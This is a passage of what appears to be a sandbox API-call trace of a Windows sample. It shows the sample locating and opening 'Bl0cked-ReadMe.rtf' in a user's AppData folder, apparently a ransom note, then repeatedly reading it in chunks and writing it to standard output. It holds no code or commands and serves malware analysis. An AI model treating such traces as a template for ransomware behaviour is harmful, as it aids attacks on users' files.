lpFindFileData=0x26ef34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ef34) returned 0x350e90 [0142.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.225] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26de40, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.225] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] GetFileType (hFile=0x54) returned 0x1 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26de98 | out: lpFileSizeHigh=0x26de98*=0x0) returned 0x1632 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] GetFileType (hFile=0x4c) returned 0x1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] GetFileType (hFile=0x4c) returned 0x1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, 
lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.230] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.232] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, 
lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.233] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.235] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.236] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.236] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: 
lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.238] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] GetFileType (hFile=0x4c) returned 0x1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.238] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.239] GetFileType (hFile=0x4c) returned 0x1 [0142.239] _get_osfhandle (_FileHandle=1) returned 0x4c 
